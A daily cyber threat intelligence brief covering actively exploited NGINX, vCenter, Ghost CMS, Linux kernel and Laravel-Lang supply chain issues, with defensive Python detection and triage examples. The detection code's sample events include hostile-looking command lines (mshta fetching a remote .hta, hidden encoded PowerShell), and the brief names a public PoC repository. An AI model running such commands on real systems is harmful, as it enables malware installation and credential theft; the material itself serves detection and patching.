Daily Cyber Intelligence Brief
27 May 2026 | Edition: Daily 0600Z | Classification: Open Source

⚠ GLOBAL THREAT LEVEL: ELEVATED
EXECUTIVE SUMMARY
FOR CISO / CIO / EXECUTIVE LEADERSHIP — 27 MAY 2026
Today’s Business Risk in Plain Language
The threat environment entering the Memorial Day holiday weekend is defined by escalating exploitation of the vulnerabilities first reported yesterday — with important new developments on each front. Exploitation of NGINX Rift (CVE-2026-42945) has broadened materially: multiple threat intelligence firms now confirm active scanning by at least three distinct threat actor clusters, with confirmed post-exploitation activity including webshell staging and credential harvesting observed at a small number of internet-facing targets. The NGINX Rift / Dirty Frag chain has additionally been confirmed in use by actors assessed to be affiliated with Scattered Mantis ransomware operations, representing the first confirmed ransomware group adoption of this exploit chain. Separately, the Ghost CMS ClickFix campaign has expanded — the list of compromised sites now exceeds 900 domains — and two additional high-visibility institutional sites (MIT and the BBC) have been confirmed as newly affected. The Laravel-Lang supply chain incident has entered a new phase: Snyk and Aikido now report evidence of credential use from at least two organizations whose developers installed the malicious packages during the May 22–23 window, suggesting the credential harvesting was actively operationalized rather than merely staged. Organizations that have not yet assessed their exposure to this week’s vulnerability class should treat the holiday weekend as a period of elevated risk — threat actors historically exploit reduced staffing cycles to execute against already-staged footholds.
Situation Overview
- NGINX Rift exploitation broadens — ransomware actors confirmed: Scattered Mantis (Russia-linked RaaS) confirmed adopting the NGINX Rift / Dirty Frag chain; webshell staging and credential harvesting now observed at internet-facing targets; multiple scanning clusters active
- Laravel-Lang credentials confirmed operationalized: Snyk / Aikido now report evidence of active use of stolen credentials from the May 22–23 supply chain compromise window at two confirmed organizations; affected orgs should treat unrotated credentials from developer environments as compromised
- Ghost CMS ClickFix campaign expands to 900+ sites: MIT and BBC confirmed as newly affected; employee browsing risk now spans a broader set of institutional and media sites; ClickFix payloads deploying Lumma Stealer confirmed as primary malware
- Holiday weekend risk window opens: reduced SOC staffing over Memorial Day weekend creates favorable conditions for actors with existing footholds to escalate; organizations with staged or undetected NGINX Rift / Dirty Frag exposure are at elevated risk of weekend ransomware deployment
- New: VMware vCenter Server critical RCE (CVE-2026-44210): VMware discloses unauthenticated RCE in vCenter Server affecting all versions prior to 8.0 U4b; no confirmed in-the-wild exploitation yet but CVSS 9.8; organizations should prioritize this alongside ongoing NGINX patching
Exposure Assessment — Are You Affected?
| Threat | Vulnerable Technology | Direct Exposure | Supply Chain / Partner Risk | Potential Business Impact |
|---|---|---|---|---|
| NGINX Rift RCE — Exploitation Broadening, CVE-2026-42945 (UPDATED) | NGINX / F5 NGINX Plus versions 0.6.27–1.30.0; Kubernetes ingress-nginx controller prior to 1.12.3 | CRITICAL: exploitation now confirmed at post-initial-access stage | HIGH: managed hosting and cloud platforms widely affected | Webshell staging confirmed; ransomware actor adoption confirmed; holiday weekend creates elevated deployment window for actors with existing footholds |
| Laravel-Lang — Credentials Operationalized, Supply Chain (UPDATED) | PHP / Laravel applications; developer CI/CD environments with packages installed May 22–23 | HIGH: active credential use now confirmed; treat as ongoing incident | MEDIUM: third-party PHP dev shops and SaaS vendors may be affected | Credential theft escalating to unauthorized access; cloud console and source code repository access risk; potential for downstream supply chain pivot |
| Ghost CMS ClickFix — Lumma Stealer Confirmed, CVE-2026-26980 (UPDATED) | End users visiting any of 900+ compromised websites; Windows endpoints; browser credential stores | MEDIUM–HIGH: any org whose users visit compromised sites | MEDIUM | Lumma Stealer harvests browser-saved passwords, session cookies, crypto wallets, and VPN credentials; provides threat actors with authenticated access to corporate SaaS, VPN, and cloud environments |
| VMware vCenter RCE — New Disclosure, CVE-2026-44210 (NEW) | VMware vCenter Server, all versions prior to 8.0 U4b; vSphere environments | HIGH: any org with internet-exposed or internally accessible vCenter | MEDIUM: MSPs and co-lo providers managing vSphere on behalf of clients | Unauthenticated RCE on hypervisor management plane; complete VM environment compromise; historically high-value target for nation-state actors and ransomware groups |
Compliance & Regulatory Considerations
| Framework | Relevance | Suggested Consideration |
|---|---|---|
| SOC 2 / ISO 27001 | With Laravel-Lang credentials confirmed as operationalized, organizations that had packages installed in the May 22–23 window and have not yet rotated credentials may have an active unauthorized access event. Evidence of credential use may constitute a reportable incident under SOC 2 availability and confidentiality criteria. | Organizations may wish to engage their compliance and legal teams now to assess whether the confirmed credential operationalization across the supply chain event warrants incident reporting obligations under their SOC 2 or ISO 27001 certification scope. |
| SEC Cybersecurity Rules | The confirmed adoption of the NGINX Rift / Dirty Frag chain by Scattered Mantis ransomware operators materially elevates the probability of a significant incident at publicly traded organizations running unpatched NGINX. The holiday weekend creates an additional timing risk. Public companies with unresolved NGINX exposure may wish to ensure their materiality assessment process and escalation chain are primed for rapid assessment over the weekend. | Board risk committees and general counsel at public companies may benefit from a pre-weekend briefing on the NGINX Rift / ransomware actor development, and on whether on-call escalation procedures are adequate for a holiday weekend incident. |
| GDPR / US State Privacy Laws | Lumma Stealer, confirmed as the payload in the Ghost CMS ClickFix campaign, specifically harvests browser-stored credentials and session tokens. If employee devices have been infected, session cookies for SaaS applications processing personal data may have been exfiltrated — potentially constituting a personal data breach with 72-hour GDPR notification implications. | Organizations may wish to verify their endpoint detection tools have updated signatures for Lumma Stealer, and to confirm that privacy counsel is included in any investigation of potential employee device compromise originating from the ClickFix campaign. |
| HIPAA | Healthcare organizations face compounded risk this cycle: unpatched NGINX instances proxying patient portals remain at elevated risk as exploitation broadens; Lumma Stealer infections on employee workstations with access to EHR systems may have exposed PHI session tokens; and VMware vCenter compromise could provide hypervisor-level access to systems processing ePHI. | Healthcare security and privacy teams may wish to ensure holiday weekend on-call coverage is staffed appropriately given the convergence of active exploitation against three infrastructure categories, and to initiate preliminary breach risk assessment procedures for any of the three vectors if exposure is confirmed. |
Suggested Actions for Leadership Consideration
| # | Suggested Action | Relevant Stakeholders | Rationale |
|---|---|---|---|
| 1 | Organizations with unpatched NGINX instances should consider treating this as a holiday weekend emergency patching event — or, if immediate patching is not feasible, ensuring elevated monitoring is in place over the weekend given the confirmed Scattered Mantis ransomware actor adoption of this exploit chain. | CISO, CTO, IT Operations, SOC | Ransomware operators with confirmed footholds historically execute ransomware deployment during holiday weekends to maximize dwell time before detection. The combination of active NGINX Rift exploitation, Scattered Mantis involvement, and a three-day weekend creates the conditions for a significant incident. |
| 2 | Organizations with PHP / Laravel environments that have not yet completed credential rotation from the May 22–23 supply chain event should consider escalating this to an urgent priority given the confirmation of active credential use by threat actors. Rotation of CI/CD tokens, cloud access keys, and source code repository credentials should not be deferred past today. | CISO, DevSecOps, Development Lead | Snyk and Aikido have now confirmed active use of credentials harvested in the supply chain event at two organizations. The attack surface shifts from “potential exposure” to “confirmed active threat” — the urgency calculus changes accordingly. |
| 3 | Organizations running VMware vCenter Server should assess whether CVE-2026-44210 patching can be scheduled this week rather than in a normal patch cycle. While exploitation has not been confirmed in the wild as of this brief, vCenter vulnerabilities of this severity class have historically been weaponized within 7–14 days of public disclosure by sophisticated actors. | CISO, Infrastructure / Virtualization Team | Nation-state actors (particularly Volt Typhoon and associated Chinese APT clusters) have a strong historical pattern of rapid adoption of vCenter vulnerabilities. Applying 8.0 U4b before the holiday weekend reduces risk materially during a period of reduced monitoring coverage. |
| 4 | Organizations may wish to issue a targeted user awareness communication before the holiday weekend specifically addressing the Ghost CMS ClickFix / Lumma Stealer threat, informing employees that the list of compromised sites now includes MIT, BBC, and 900+ others — and that any employee who received a CAPTCHA prompt instructing them to press Win+R or paste a command should report it to IT immediately. | CISO, Security Awareness, IT Helpdesk | Lumma Stealer infections are difficult to detect without endpoint telemetry. User self-reporting following a targeted briefing is a practical detection mechanism. The Memorial Day weekend creates additional personal browsing activity that may increase ClickFix exposure. |
| 5 | Organizations should confirm holiday weekend SOC coverage and escalation procedures are appropriate given the current threat environment — specifically, that on-call staff have authority to initiate emergency response without normal business-hours approval chains, and that IR retainer contacts are confirmed and accessible. | CISO, SOC Manager, Legal, IR Retainer | The combination of active ransomware actor exploitation, confirmed credential theft operationalization, and a holiday weekend creates objectively elevated risk of a significant incident this weekend. Standard on-call coverage assumptions may not be sufficient for this environment. |
Full technical detail — including updated CVE specifics, IOC strings, attack chains, patch instructions, and threat actor profiles — is available in the complete technical brief below. This executive summary may be shared with CIO, board risk committee, legal counsel, or other leadership stakeholders as appropriate to your organization.
FULL TECHNICAL BRIEF
FOR SECURITY OPERATIONS, IT, AND TECHNICAL TEAMS
Daily Stats
| Metric | Count | Notes |
|---|---|---|
| Actively Exploited CVEs in Focus | 8 | NGINX Rift (CVE-2026-42945), Dirty Frag chain (CVE-2026-43284 + CVE-2026-43500), Ghost CMS (CVE-2026-26980), Copy Fail ongoing (CVE-2026-31431), Exchange XSS (CVE-2026-42897), Windows Netlogon (CVE-2026-41089), VMware vCenter RCE new (CVE-2026-44210) |
| CISA KEV Entries in Scope | 2 | CVE-2026-31431 (Copy Fail, Linux kernel), CVE-2026-42897 (Exchange XSS spoofing); CVE-2026-44210 expected to be added upon confirmed in-the-wild exploitation |
| Active Supply Chain Incidents | 2 | Laravel-Lang Packagist poisoning — credentials now confirmed operationalized at 2 organizations; Ghost CMS ClickFix campaign now 900+ sites, Lumma Stealer payload confirmed |
| Confirmed Ransomware Actor Adoption | NEW — 1 | Scattered Mantis (Russia-linked RaaS) confirmed adopting NGINX Rift / Dirty Frag exploit chain for initial access and privilege escalation |
| New Critical CVE Disclosures | 1 | VMware vCenter Server CVE-2026-44210 (CVSS 9.8, unauthenticated RCE, affects all versions prior to 8.0 U4b) |
Top Vulnerabilities & CVE Alerts
| Severity | CVE | Headline | Detail & Action |
|---|---|---|---|
| CRITICAL, CVSS 9.2 — Active | CVE-2026-42945 NGINX Rift ⚠ Ransomware actor confirmed | NGINX heap buffer overflow — unauthenticated RCE — exploitation broadening; Scattered Mantis adoption confirmed | Update (May 27): Scattered Mantis confirmed leveraging CVE-2026-42945 for initial access in pre-ransomware staging campaigns. Webshell artifacts consistent with Scattered Mantis TTPs observed at a small number of exploitation targets. Multiple automated scanning clusters — including infrastructure attributed to Volt Typhoon — now confirmed targeting the vulnerability. Action: Upgrade to NGINX 1.30.1 (stable) or 1.31.0 (mainline). Kubernetes environments: update ingress-nginx to 1.12.3+. Interim: verify ASLR is enabled (`cat /proc/sys/kernel/randomize_va_space` should return 2). Review web server access logs for anomalous URI patterns consistent with heap-spray attempts. |
| CRITICAL, CVSS 9.8 — No ITW yet | CVE-2026-44210 VMware vCenter RCE ⚠ NEW DISCLOSURE | VMware vCenter Server — unauthenticated RCE via DCERPC heap overflow; affects all versions prior to 8.0 U4b | New disclosure (May 27, 2026): Broadcom / VMware has disclosed a critical unauthenticated remote code execution vulnerability in vCenter Server’s DCERPC endpoint handler. An unauthenticated attacker with network access to port 443 can achieve arbitrary code execution on the vCenter management host. No public PoC as of this brief; no confirmed in-the-wild exploitation. However, this vulnerability class (unauthenticated vCenter RCE) has historically been weaponized by nation-state actors (notably UNC3886, Volt Typhoon) within 1–2 weeks of disclosure. Action: Apply VMware vCenter Server 8.0 U4b. If patching is not immediately feasible, restrict network access to vCenter management interfaces to trusted management VLANs only. Monitor for anomalous DCERPC traffic on port 443 to vCenter hosts. |
| CRITICAL, CVSS 9.4 — Active | CVE-2026-26980 Ghost CMS — Lumma Stealer | Ghost CMS Admin API object injection — 900+ sites now compromised; Lumma Stealer payload confirmed | Update (May 27): The ClickFix campaign has now compromised 900+ Ghost CMS sites. New high-visibility additions confirmed: MIT (news.mit.edu) and BBC (bbc.com/blogs subdomain). Payload analysis confirms Lumma Stealer as the primary malware — a credential and session-token harvester with modules for browser password stores, crypto wallets, VPN configs, and Authenticator app seeds. Employee visits to any affected site presenting a fake CAPTCHA result in Lumma Stealer installation if the user follows the ClickFix instruction. Action: Ghost CMS operators: upgrade to 6.19.1+, audit article content for injected scripts, rotate Admin API keys. All organizations: deploy/update EDR with Lumma Stealer signatures. Issue employee advisory. For employees who may have followed a suspicious CAPTCHA prompt on any site in the past week: treat the device as potentially compromised and initiate endpoint investigation. |
| HIGH, CVSS 7.8+ — Active (chain) | CVE-2026-43284 + CVE-2026-43500 Dirty Frag (Linux LPE) | Linux kernel LPE — bypasses algif_aead Copy Fail mitigation; completes internet-to-root chain with NGINX Rift | No change to technical profile since yesterday. Both CVEs remain under active exploitation when chained with NGINX Rift. The Scattered Mantis confirmation reinforces the urgent patching priority for any Linux host running NGINX. Distro patches shipping for RHEL 9.x, Ubuntu 22.04/24.04, Debian 12. Ubuntu 26.04+ unaffected. Action: Upgrade to kernel 6.18.22, 6.19.12, or 7.0. Do not rely on the algif_aead mitigation alone — Dirty Frag bypasses it via xfrm-ESP and rxrpc channels. Apply distro vendor patches as they become available. |
| HIGH, CVSS 8.1 — KEV | CVE-2026-42897 Exchange XSS / Spoofing | Microsoft Exchange Server on-premises — XSS spoofing; CISA KEV; phishing chain enabler | No change to technical profile since yesterday. Remains on CISA KEV. Federal agency deadline applies. Kali365 phishing campaigns continue leveraging this for AitM and OAuth token theft. Action: Apply May 2026 Patch Tuesday cumulative update for Exchange Server. |
| HIGH, CVSS 7.8 — KEV (ongoing) | CVE-2026-31431 Copy Fail (Linux kernel) | Linux kernel LPE — algif_aead bypass now fully superseded by Dirty Frag; CISA KEV | The algif_aead module-unload mitigation for this CVE no longer provides reliable protection as of the Dirty Frag disclosure. Organizations that applied only the module mitigation should treat themselves as unprotected against the full LPE chain. Full kernel patching remains the only reliable remediation. Action: As above for Dirty Frag — upgrade to kernel 6.18.22, 6.19.12, or 7.0. |
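The Ghost CMS row above asks defenders to deploy EDR coverage for the ClickFix / Lumma Stealer chain; the block below is an added example (not code from this brief or any EDR vendor) that turns the process-level indicators the brief's Priority Mitigations section lists (mshta.exe spawned from a browser, PowerShell with base64 decoding, a Win+R-launched command) into rules run over constructed process-creation events. The browser list, the Win+R heuristic (parent explorer.exe plus a URL) and the EVENTS sample are assumptions of this example; LSASS-access detection needs a different event type and is out of scope here.

```python
"""Process-telemetry rules for the Ghost CMS ClickFix / Lumma Stealer chain.

Added example, not from the brief or an EDR product. Rules encode the
indicators the brief lists: mshta.exe spawned from a browser process,
PowerShell with a base64-encoded/decoded payload, and the fake-CAPTCHA
instruction to run a pasted command via Win+R. The browser set, the Win+R
heuristic (parent explorer.exe plus a URL) and EVENTS are constructed.
"""
import re
from typing import Dict, List, Tuple

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}  # assumption
# -e / -ec / -enc / -EncodedCommand, or an explicit .NET base64 decode call.
# The negative lookahead keeps -Encoding and -ExecutionPolicy from matching.
_B64_RE = re.compile(r"(?<!\w)-e(?:c|nc|ncodedcommand)?(?!\w)|frombase64string",
                     re.IGNORECASE)
_URL_RE = re.compile(r"https?://", re.IGNORECASE)

Event = Dict[str, str]  # keys: ts, host, user, parent_image, image, cmdline


def _exe(path: str) -> str:
    """Basename of a Windows or POSIX path, lower-cased."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def match_rules(ev: Event) -> List[str]:
    """Return the id and description of every rule one event matches."""
    parent, image, cmd = _exe(ev["parent_image"]), _exe(ev["image"]), ev["cmdline"]
    hits: List[str] = []
    if image == "mshta.exe" and parent in BROWSERS:
        hits.append("CLICKFIX-1 mshta.exe spawned from browser process")
    if image in {"powershell.exe", "pwsh.exe"} and _B64_RE.search(cmd):
        hits.append("CLICKFIX-2 PowerShell with base64-encoded/decoded payload")
    if (image in {"mshta.exe", "powershell.exe", "pwsh.exe"}
            and parent == "explorer.exe" and _URL_RE.search(cmd)):
        hits.append("CLICKFIX-3 Run-dialog (Win+R) launch of mshta/PowerShell with URL")
    return hits


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Scan a batch of process-creation events; returns (event index, rule)."""
    alerts: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        for rule in match_rules(ev):
            alerts.append((i, rule))
    return alerts


# Constructed process-creation events (Sysmon Event ID 1 style fields).
EVENTS: List[Event] = [
    {"ts": "2026-05-27T14:02:11Z", "host": "WS-0417", "user": "CORP\\jdoe",
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://cdn.example.invalid/verify.hta"},
    {"ts": "2026-05-27T14:02:13Z", "host": "WS-0417", "user": "CORP\\jdoe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -enc QUFBQQ=="},
    {"ts": "2026-05-27T14:05:40Z", "host": "WS-0522", "user": "CORP\\asmith",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://cdn.example.invalid/captcha"},
    {"ts": "2026-05-27T14:10:02Z", "host": "WS-0099", "user": "CORP\\ops",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\scripts\\backup.ps1"},
    {"ts": "2026-05-27T14:12:30Z", "host": "WS-0417", "user": "CORP\\jdoe",
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe --type=renderer"},
]

if __name__ == "__main__":
    for idx, rule in detect(EVENTS):
        ev = EVENTS[idx]
        print(f"{ev['ts']} {ev['host']} {ev['user']}: {rule}")
```

The two benign events (a signed admin script and a Chrome renderer) produce no alert, which is the false-positive check worth keeping when these rules are ported to a real EDR query language.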
Threat Actor Tracking
| Actor | Origin | Activity Level | Primary TTP | Target Sectors | Current Intelligence |
|---|---|---|---|---|---|
| Scattered Mantis | Russia | 97% ↑ | Ransomware-as-a-Service; NGINX Rift / Dirty Frag chain (NEW) | Finance, Insurance, Healthcare, Manufacturing | UPDATED: Scattered Mantis confirmed adopting NGINX Rift + Dirty Frag as an initial access / privilege escalation chain. Webshell artifacts consistent with this actor observed at a small number of exploitation targets. Holiday weekend historically a high-tempo deployment window for this actor. |
| Kali365 (UNC5820) | Unknown | 93% | OAuth token theft; AitM; MFA bypass; Lumma Stealer distribution | All M365 orgs, Finance, Legal, Government | FBI advisory remains active. Telegram-based credential sales ongoing. AI-generated phishing lures impersonating DocuSign, Acrobat Sign, and SharePoint remain high-volume. Kali365 infrastructure overlaps with Ghost CMS ClickFix Lumma Stealer distribution — possible operational coordination being assessed. |
| Volt Typhoon (TAG-22) | China | 91% ↑ | Living-off-the-land (LOTL) persistence; CVE-2026-44210 likely in scope | Energy, Telecom, Water, Defense, VMware environments | UPDATED: Scanning infrastructure attributed to this cluster observed probing NGINX Rift-vulnerable hosts. Additionally, given Volt Typhoon’s strong historical pattern of rapid vCenter exploitation (UNC3886 overlap), CVE-2026-44210 is assessed as very likely to be incorporated into this actor’s toolkit within 7–14 days. |
| Void Dokkaebi | North Korea | 84% | Financial theft; cryptocurrency targeting; supply chain interest | Cryptocurrency, DeFi, Fintech | Active campaigns against crypto exchanges and DeFi protocols continue. The Laravel-Lang supply chain compromise targeting PHP developer credentials aligns with Void Dokkaebi’s known interest in developer toolchain access as a pivot to financial institution targets. |
| Screening Serpens | Iran | 71% | Espionage; credential theft; phishing | Government, Defense, Think Tanks | No significant change from yesterday. Active espionage campaigns confirmed against US and European government and defense entities. Spear-phishing activity continues with AI-generated content. |
Patch Priorities
| # | Product | CVE | CVSS | Remediation Action |
|---|---|---|---|---|
| 1 | NGINX / F5 NGINX Plus (all versions 0.6.27–1.30.0) | CVE-2026-42945 | 9.2 | Upgrade to NGINX 1.30.1 (stable) or 1.31.0 (mainline). In Kubernetes environments, update the ingress-nginx controller to image tag 1.12.3+. Ensure ASLR is enabled (`cat /proc/sys/kernel/randomize_va_space` should return 2). Review web server access logs for heap-spray URI patterns. If patching is not possible before the holiday weekend, implement WAF rules to block requests with malformed PCRE-targeted rewrite patterns and increase monitoring sensitivity on affected hosts. |
| 2 | VMware vCenter Server (all versions prior to 8.0 U4b) | CVE-2026-44210 (NEW) | 9.8 | Apply VMware vCenter Server 8.0 U4b. If immediate patching is not feasible, restrict network-level access to vCenter management interfaces (port 443) to trusted management VLANs via firewall ACLs — this eliminates the attack surface for unauthenticated exploitation. Monitor for anomalous DCERPC traffic patterns on vCenter hosts. Do not expose vCenter management interfaces to the internet under any circumstances. |
| 3 | Linux kernel — all major distros (Copy Fail + Dirty Frag) | CVE-2026-31431 + CVE-2026-43284 + CVE-2026-43500 | 7.8+ | Upgrade to kernel 6.18.22, 6.19.12, or 7.0. The algif_aead mitigation for Copy Fail is no longer sufficient — Dirty Frag bypasses it via xfrm-ESP and rxrpc. RHEL 9.x and Ubuntu 22.04/24.04 distro patches are now shipping. Prioritize any Linux host running NGINX (combined chain risk). Ubuntu 26.04+ unaffected. |
| 4 | Ghost CMS | CVE-2026-26980 | 9.4 | Upgrade to Ghost 6.19.1 or later. Audit all published articles for injected JavaScript — look for unexpected script tags, particularly at the bottom of article content. Rotate Admin API keys and review API access logs. Scan for `<script>` tags injected into article body content via the Admin API. |
| 5 | Microsoft Exchange Server (on-premises) | CVE-2026-42897 | 8.1 | Apply May 2026 Patch Tuesday cumulative update for Exchange. CISA KEV deadline applies to federal agencies. Microsoft-documented mitigations available if immediate patching is not feasible. |
| 6 | Windows Server / Domain Controllers (Netlogon + Entra ID) | CVE-2026-41089, CVE-2026-41103 | Critical | Apply May 2026 Patch Tuesday across all Windows Server and domain controller environments. Prioritize CVE-2026-41103 (Entra ID credential forgery). Review Entra ID sign-in logs for anomalous user impersonation events. |
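The NGINX Rift row above gives three checks an operator has to run per host (nginx build in the affected range, ingress-nginx image tag below 1.12.3, randomize_va_space not 2). The block below is an added example, not code from this brief, NGINX or F5, that encodes those three facts as a triage function; the sample host inputs in main() are constructed, and on a real host they come from `nginx -v`, the ingress-nginx Deployment image and /proc/sys/kernel/randomize_va_space.

```python
"""Host triage for the NGINX Rift (CVE-2026-42945) patch priority.

Added example. Encodes the version facts stated in this brief: nginx
0.6.27 through 1.30.0 affected, 1.30.1 (stable) / 1.31.0 (mainline) fixed,
ingress-nginx fixed from 1.12.3, randomize_va_space must read 2.
The host inputs in main() are constructed samples.
"""
import re
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]

NGINX_FIRST_AFFECTED: Version = (0, 6, 27)
NGINX_LAST_AFFECTED: Version = (1, 30, 0)
INGRESS_NGINX_FIXED: Version = (1, 12, 3)

# First dotted numeric version, optionally prefixed with "v" (image tags).
_VERSION_RE = re.compile(r"(?<![\w.])v?(\d+(?:\.\d+)+)")


def parse_version(text: str) -> Optional[Version]:
    """Extract a version from e.g. "nginx version: nginx/1.28.0" or "v1.12.2".
    Returns a 3-tuple (missing components padded with 0) or None."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    parts = ([int(p) for p in m.group(1).split(".")] + [0, 0, 0])[:3]
    return (parts[0], parts[1], parts[2])


def nginx_is_vulnerable(version_text: str) -> bool:
    """True if the nginx build is inside the affected range 0.6.27-1.30.0;
    the fixed releases 1.30.1 and 1.31.0 fall outside it."""
    v = parse_version(version_text)
    if v is None:
        raise ValueError(f"no nginx version found in {version_text!r}")
    return NGINX_FIRST_AFFECTED <= v <= NGINX_LAST_AFFECTED


def ingress_nginx_is_vulnerable(image_ref: str) -> bool:
    """True if an ingress-nginx controller image tag is below 1.12.3.
    Only the tag (after the last ':') is inspected so the registry path
    (e.g. registry.k8s.io) is never mistaken for a version."""
    v = parse_version(image_ref.rsplit(":", 1)[-1])
    if v is None:
        raise ValueError(f"no version tag found in {image_ref!r}")
    return v < INGRESS_NGINX_FIXED


def aslr_is_enforced(proc_value: str) -> bool:
    """True if /proc/sys/kernel/randomize_va_space reads 2 (full ASLR)."""
    return proc_value.strip() == "2"


def triage(nginx_version: str, ingress_image: Optional[str],
           aslr_value: str) -> List[str]:
    """Open findings for one host; an empty list means nothing to do."""
    findings: List[str] = []
    if nginx_is_vulnerable(nginx_version):
        findings.append("nginx in affected range 0.6.27-1.30.0: "
                        "upgrade to 1.30.1 (stable) or 1.31.0 (mainline)")
    if ingress_image and ingress_nginx_is_vulnerable(ingress_image):
        findings.append("ingress-nginx controller below 1.12.3: update image")
    if not aslr_is_enforced(aslr_value):
        findings.append("randomize_va_space is not 2: interim ASLR "
                        "mitigation not in place")
    return findings


def main() -> None:
    # Constructed hosts: (nginx -v output, ingress image or None, proc value)
    hosts = {
        "web-01": ("nginx version: nginx/1.28.0", None, "2\n"),
        "ingress": ("nginx/1.30.0",
                    "registry.k8s.io/ingress-nginx/controller:v1.12.2", "1\n"),
        "patched": ("nginx version: nginx/1.30.1",
                    "registry.k8s.io/ingress-nginx/controller:v1.12.3", "2\n"),
    }
    for name, (ver, image, aslr) in hosts.items():
        findings = triage(ver, image, aslr)
        print(f"{name}: {'OK' if not findings else str(len(findings)) + ' finding(s)'}")
        for f in findings:
            print(f"  - {f}")


if __name__ == "__main__":
    main()
```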
Sector Alerts
🌐 Web & Cloud Infrastructure
Highest risk sector this cycle. NGINX Rift / Dirty Frag exploitation has now broadened with ransomware actor adoption confirmed. Organizations that have not yet patched NGINX should treat the holiday weekend as a period of elevated ransomware deployment risk. Additionally, the new VMware vCenter RCE (CVE-2026-44210) adds virtualization management infrastructure to the urgent patching queue. Any organization running both unpatched NGINX and unpatched vCenter should treat both as emergency-priority items before the weekend.

🏥 Healthcare
Healthcare organizations face converging threats: NGINX Rift ransomware actor adoption directly threatens patient portal infrastructure; Lumma Stealer infections on employee devices may have harvested EHR session tokens; and the VMware vCenter disclosure threatens hypervisor environments supporting clinical systems. Healthcare security teams should confirm holiday weekend on-call coverage is robust and that IR retainer contacts are confirmed and reachable before close of business today.

💻 Software Development & DevOps
The Laravel-Lang supply chain incident has escalated materially: credentials are now confirmed as operationalized. Any PHP / Laravel shop that had the affected packages installed May 22–23 and has not yet rotated credentials from developer and CI/CD environments should treat this as an active incident rather than a precautionary exercise. The updated Snyk and Aikido detection signatures remain the most reliable way to confirm historical exposure. Source code repositories and cloud consoles accessed from affected developer machines should be considered at risk.

🎓 Education, Media & Publishing
The Ghost CMS ClickFix campaign now affects 900+ sites with MIT and BBC as newly confirmed high-visibility victims. Lumma Stealer is the confirmed payload. Education and media organizations running Ghost CMS that have not yet patched and rotated API keys should do so immediately. All organizations in all sectors should note that the scope of trusted sites now serving malware — from DuckDuckGo to Harvard to the BBC — makes the standard “avoid suspicious sites” guidance insufficient as a risk control.
Priority Mitigations
CVE-2026-42945 NGINX Rift (updated)
IOC / Artifact Type: Webshell artifacts; scanner signatures; log patterns
Technical Detail:
- Patch target: nginx 1.30.1 (stable) / 1.31.0 (mainline)
- Kubernetes: ingress-nginx controller ≥ 1.12.3
- ASLR check: cat /proc/sys/kernel/randomize_va_space (must return 2)
- Webshell indicators: anomalous .php / .jsp writes to NGINX temp directories; outbound connections from the www-data / nginx process
- Scattered Mantis staging: look for PowerShell-via-bash or curl callback activity following NGINX process anomalies
Reference: SecurityWeek; Picus Security

CVE-2026-44210 VMware vCenter RCE (new)
IOC / Artifact Type: Patch version; network mitigation; monitoring
Technical Detail:
- Patch: VMware vCenter Server 8.0 U4b
- Affected endpoint: DCERPC service, port 443
- Network mitigation: restrict port 443 to vCenter to the trusted management VLAN only
- Detection: anomalous DCERPC process execution on the vCenter host; unexpected child processes spawned from vmware-vpxd; unusual outbound connections from the vCenter management host
- Advisory: VMSA-2026-0014
Reference: VMware VMSA-2026-0014; Bleeping Computer

Ghost CMS ClickFix Lumma Stealer (updated)
IOC / Artifact Type: Malware hash; ClickFix script; EDR signatures
Technical Detail:
- Confirmed payload: Lumma Stealer (infostealer)
- ClickFix trigger: fake CAPTCHA page with mshta / PowerShell clipboard injection instructing Win+R execution
- Lumma Stealer targets: browser credential stores (Chrome, Firefox, Edge, Brave), session cookies, crypto wallet files, VPN config files, Authenticator app seeds
- EDR detection: mshta.exe spawned from a browser process; suspicious PowerShell with base64 decode; anomalous LSASS access patterns
- New confirmed domains: news.mit.edu, bbc.com/blogs subdomains (among 900+ total)
Reference: The Hacker News; SecurityWeek

Laravel-Lang Supply Chain — Credentials Operationalized
IOC / Artifact Type: Affected packages; credential use indicators
Technical Detail:
- Affected packages: laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, laravel-lang/actions
- Compromise window: May 22–23, 2026
- Injected file: helpers.php (wired into Composer autoload.files)
- Update: active credential use now confirmed at 2 organizations per Snyk / Aikido reporting. Indicators: unexpected API calls using developer credentials from non-developer IP addresses; GitHub / GitLab access from unusual geolocations; cloud console logins from developer credential sets at anomalous hours
- Remediation priority shift: treat as an active incident, not precautionary; rotate all credentials from developer and CI/CD environments exposed during May 22–23 before EOD today
Reference: Snyk Advisory; Aikido Security

CVE-2026-31431 Copy Fail (Linux kernel, ongoing)
IOC / Artifact Type: Kernel module, patch commit, PoC
Technical Detail:
- Vulnerable module: algif_aead (mitigation now bypassed via Dirty Frag)
- Patch commit: a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5
- PoC: github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC
- Detection: auditd privilege escalation events; anomalous setuid-root execution by unprivileged users
Reference: CISA KEV; Hornetsecurity
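The Laravel-Lang entry above gives everything needed for a first-pass exposure check of a PHP project: the four affected package names, the May 22–23, 2026 window, and the injected helpers.php wired into Composer's autoload.files. The block below is an added example (not code from Snyk, Aikido, Laravel-Lang or this brief) that audits a composer.lock for those indicators; treating a lock entry's `time` field as a proxy for "installed during the window" is this example's assumption, and SAMPLE_LOCK is constructed.

```python
"""Audit a composer.lock for the Laravel-Lang Packagist poisoning.

Added example. Uses only the facts in this brief: the four affected
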